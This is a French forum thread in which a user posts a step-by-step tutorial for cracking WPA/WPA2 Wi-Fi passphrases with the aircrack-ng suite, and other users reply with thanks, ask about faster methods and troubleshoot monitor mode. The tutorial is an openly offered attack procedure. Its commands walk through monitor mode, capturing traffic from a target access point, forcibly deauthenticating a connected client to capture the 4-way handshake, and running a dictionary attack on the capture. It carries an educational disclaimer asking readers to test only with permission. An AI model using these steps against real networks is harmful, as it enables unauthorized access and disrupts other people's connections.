Annonce

Réduire
Aucune annonce.

[Crack the WPA/WPA2 passphrase]

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Crack the WPA/WPA2 passphrase]

    Ce tutoriel s'inscrit dans une optique pédagogique et présente un des vecteurs possible d'attaque sur les réseaux wifi sécurisés avec la technologie WPA/WPA2(Wireless Protectect Access), il inclut la déconnexion de station sur le réseau et peut perturber l'activité de celui-ci, testez cette attaque sur votre matériel ou avec des personnes qui vous ont données l'autorisation.

    Prérequis :
    • Une carte compatible avec le mode "moniteur" et capable d'injecter des paquets sur le réseau.
    • Un point d'accès wifi sécurisé avec la technologie WPA/WPA2.
    • Un client authentifié sur le point d'accès.
    • Un dictionnaire qui servira à bruteforce la clé.


    Le but de cette attaque est de capturer le 4-way handshake réalisé lors de l'authentification d'un client sur le WLAN(Wide Local Area network).Pour ce faire, nous devons déauthentifier une station présente sur le réseau.

    L'image qui suit décrit le contexte de l'attaque :

    atkwifi.jpg


    L'attaque se déroulera en cinq étapes :
    1. Créer une interface en mode "moniteur".
    2. Récupérer les informations sur le réseau à attaquer.
    3. Configurer notre carte réseau sur la même channel que le réseau wifi ciblé.
    4. Déauthentifier une station et récupérer le 4-way handshake.
    5. Lancer l'attaque par dictionnaire sur la capture effectuée.





    [1] - Créer une interface en mode "moniteur"



    Pour créer une interface en mode "moniteur", vous avez le choix entre l'outil intégrer dans la suite aircrack-ng, airmon-ng, ou l'utilaire iw, l'équivalent de ifconfig mais dédié aux

    cartes wifi :

    Avec airmon-ng :

    Code:
    sudo airmon-ng start wlan0
    wlan0 est le nom de votre interface wifi à passée en mode moniteur.

    Avec iw:

    Code:
    sudo iw dev wlan0 interface add mon0 type monitor
    wlan0 est le nom de votre interface wifi à passée en mode moniteur, et mon0 le nom de l'interface "moniteur" crée.

    Si vous avez utilisé la deuxième méthode, vous devrez activé l'interface avec la commande :

    Code:
    sudo ifconfig mon0 up
    mon0 est le nom de l'interface "moniteur" crée à activée.




    [2] - Récupérer les informations sur le réseau à attaquer


    Maintenant que notre interface est prête, nous allons écouter le réseau grâce à l'outil airodump-ng :

    Code:
    sudo airodump-ng mon0
    mon0 est le nom de l'interface "moniteur" que vous avez créée.

    Vous devriez tombé sur une fenêtre similaire à celle-ci :

    rect4248.jpg

    On y retrouve les points d'accés présent autour de vous ainsi que les stations et leurs états, localisez le point d'accès sur lequel vous voulez lancer l'attaque dans la colonne

    ESSID, sur la ligne qui décrit les informations propre au point d'accès une colonne CH est présente, le numéro associé correspond à la channel sur lequel votre point

    d'accès émet. Mémorisez ce numéro et copier dans le presse papier le BSSID(adresse MAC) lié à votre point d'accès.




    [3] - Configurer notre carte réseau sur la même channel que le réseau wifi ciblé


    Interrompez l’exécution d'airodump-ng(CTRL+C) et relancez le pour ne collecter que les données liées à notre point d'accès :

    Code:
    sudo airodump-ng --bssid 00:00:00:00:00:00 --channel 7 mon0
    00:00:00:00:00:00 est l'adresse mac du point d'accès, et 7, la channel sur lequel il diffuse,mon0 le nom de l'interface "moniteur" que vous avez créée.

    Lorsque le tool sera lancé, localisez votre station authentifiée sur le réseau et noter son adresse MAC.

    L'adresse MAC de la station notée, vous pouvez quitter airodump-ng et changer la channel de votre carte réseau pour préparer

    la déauthentification du client connecté :

    Code:
    sudo iwconfig wlan0 down
    wlan0 est l'interface sur laquelle vous avez créé l'interface de type "moniteur".

    Code:
    sudo iwconfig wlan0 channel 7
    wlan0 est l'interface sur laquelle vous avez créé l'interface de type "moniteur", et 7 la channel sur laquelle votre point d'accès émet.

    Code:
    sudo iwconfig wlan0 up
    wlan0 est l'interface sur laquelle vous avez créé l'interface de type "moniteur".




    [4] - Déauthentifier une station et récupérer le 4-way handshake


    C'est l'étape clé de notre attaque, avant de déauthentifier le client, nous devons relancer airodump-ng pour capturer le 4-way handshake qui nous servira pour

    l'attaque par dictionnaire :

    Code:
    sudo airodump-ng --bssid 00:00:00:00:00:00 --channel 7 --write WPAhandShake mon0
    00:00:00:00:00:00 est l'adresse mac du point d'accès,7, la channel sur lequel il diffuse,WPAhandShake le nom du fichier dans lequel les paquets réseau

    seront sauvegardés, et mon0 le nom de l'interface "moniteur" que vous avez créée.

    Dans un autre terminal, vous pouvez maintenant lancer la déauthentification du client avec la commande suivante :

    Code:
    sudo aireplay-ng -0 20 -a 00:00:00:00:00:00 -c 00:00:00:00:00:0A mon0
    20 est le nombre de déauthentification à envoyé, 00:00:00:00:00:00 , l'adresse MAC du point d'accès, 00:00:00:00:00:0A l'adresse MAC de la station connectée

    au point d'accès, et mon0 le nom de l'interface "moniteur" que vous avez créée.

    Si les trames ont bien été envoyées airodump-ng devrait vous notifiez qu'il a intercepter un handshake :

    image4195.jpg

    Vous avez maintenant tout entre vos mains pour lancer l'attaque par dictionnaire sur le fichier créer par airodump-ng précédemment.



    [5] - Lancer l'attaque par dictionnaire sur la capture effectuée

    Commande :

    Code:
    sudo aircrack-ng WPAhandShake -w /home/guest/dico.txt
    WPAhandShake est le nom du fichier dans lequel les paquets réseau ont été sauvegardés, et /home/guest/dico.txt le chemin du dictionnaire à utiliser.


    Soyez patient, mais n’espérez pas trouver la clé si elle n'était pas présente dans le dictionnaire ! ~
    Dernière modification par shirocen, 01 avril 2016, 21h56.
    deux et deux font cinq

  • #2
    Merci pour ton tuto shirocen.

    Je ne suis pas du tout spécialisé en crack wifi mais j'ai entendu dire qu'il existe des méthodes plus rapides pour le WPA2. Peux tu me confirmer ?

    Si oui, pourrais tu nous proposer un tuto ?

    Merci encore.

    Commentaire


    • #3
      Tu as parfaitement raison .

      Concernant le crack de la clé en elle-même, il existe un moyen d'utiliser la puissance du GPU(pour les cartes nvidia ->CUDA) pour accélérer le processus.

      On pourra aussi générer des dico "modulaires" en fonction de la taille de la clé pour un crackage plus rapide.

      D'autre méthodes sont dispo', cependant je ne suis pas en mesure de les expliquées, je pense au precompute PSK(pre shared key -> clé WPA) et aux rainbow table.
      Dernière modification par shirocen, 01 avril 2016, 20h20.
      deux et deux font cinq

      Commentaire


      • #4
        Tuto parfait pédagogiquement parlant, rien à redire ! Merci pour ce très bon tutoriel

        Commentaire


        • #5
          Un nouveau tutoriel consacré au WPS(Wifi Protected Setup) arrive dans la foulée !

          N'hésitez pas à donner votre avis et proposer des idées de tuto comme l'a fait anonyme77.

          Merci pour vos encouragements !
          deux et deux font cinq

          Commentaire


          • #6
            Un nouveau tutoriel consacré au WPS(Wifi Protected Setup) arrive dans la foulée !
            Concernant des vulnérabilités ou juste un tutoriel expliquant l'utilisation d'un appareil par ce système ?

            Commentaire


            • #7
              Un nouveau tutoriel consacré au WPS(Wifi Protected Setup) arrive dans la foulée !
              Concernant des vulnérabilités ou juste un tutoriel expliquant l'utilisation d'un appareil par ce système ?

              Commentaire


              • #8
                Concernant des vulnérabilités ou juste un tutoriel expliquant l'utilisation d'un appareil par ce système ?
                Les vulnérabilités !
                deux et deux font cinq

                Commentaire


                • #9
                  Les vulnérabilités !
                  Très bien, je ne voyais sinon pas trop l'intérêt d'expliquer juste le WPS sans parler des vulnérabilités.

                  Commentaire


                  • #10
                    Besoin d'aide si quelqu'un lis ce commentaire qu'il m'aide car j'ai installé "aircrack-ng" mais je n'ai pas airmon-ng . Je suis assez nouveau dans ce monde donc quelques explications ne me feraient pas de mal ! Je suis près a passer des 10aines d'heures par jour en skype pour apprendre ! S'il vous plait ;

                    cordialement le mec qui écri des poésies xD

                    Commentaire


                    • #11
                      Envoyé par kiwi_funny Voir le message
                      Besoin d'aide si quelqu'un lis ce commentaire qu'il m'aide car j'ai installé "aircrack-ng" mais je n'ai pas airmon-ng . Je suis assez nouveau dans ce monde donc quelques explications ne me feraient pas de mal ! Je suis près a passer des 10aines d'heures par jour en skype pour apprendre ! S'il vous plait ;

                      cordialement le mec qui écri des poésies xD
                      Quel est le problème exactement ? Qu'as-tu déjà fais/tester/tenter ?

                      J'ai des doutes sur le temps d'apprentissage, en lisant un tuto, en 1 heure maxi, c'est bâclé, même débutant !

                      Commentaire


                      • #12
                        Envoyé par fred Voir le message

                        Quel est le problème exactement ? Qu'as-tu déjà fais/tester/tenter ?

                        J'ai des doutes sur le temps d'apprentissage, en lisant un tuto, en 1 heure maxi, c'est bâclé, même débutant !
                        Dans tout les cas je te fait passer mon skype en dm

                        Commentaire


                        • #13
                          Alors là si tu savais, j'ai bien d'autres choses à faire que de faire joujou avec skype... Sans parler de skype, tu as un problème, mieux vaut l'exprimer sur le forum dans le cas où d'autres membres souhaiteraient résoudre un problème similaire.

                          Bonne journée...

                          Commentaire


                          • #14
                            Bonsoir ,


                            Je suis sous Windows 10 avec une machine virtuelle Kali Linux. Mon problème étant qu'en tapant la commande :

                            sudo iw dev wlan0 interface add mon0 type monitor

                            mon terminal m'affiche : Command Failed : no such device (-19)

                            Pourriez-vous m'aider ?

                            Bonne soirée

                            Commentaire


                            • #15
                              Envoyé par koshhh Voir le message
                              Bonsoir ,


                              Je suis sous Windows 10 avec une machine virtuelle Kali Linux. Mon problème étant qu'en tapant la commande :

                              sudo iw dev wlan0 interface add mon0 type monitor

                              mon terminal m'affiche : Command Failed : no such device (-19)

                              Pourriez-vous m'aider ?

                              Bonne soirée
                              Bonsoir Koshhh,

                              Je pense que ton problème résulte du fait que tu ne possèdes pas une carte WIFI configurable en mode monitor.

                              Je laisse les anciens confirmer mes dires, mais le "no such device" m'a l'air de correspondre.

                              Bonne soirée,

                              Jeriko

                              Commentaire

                              Chargement...
                              X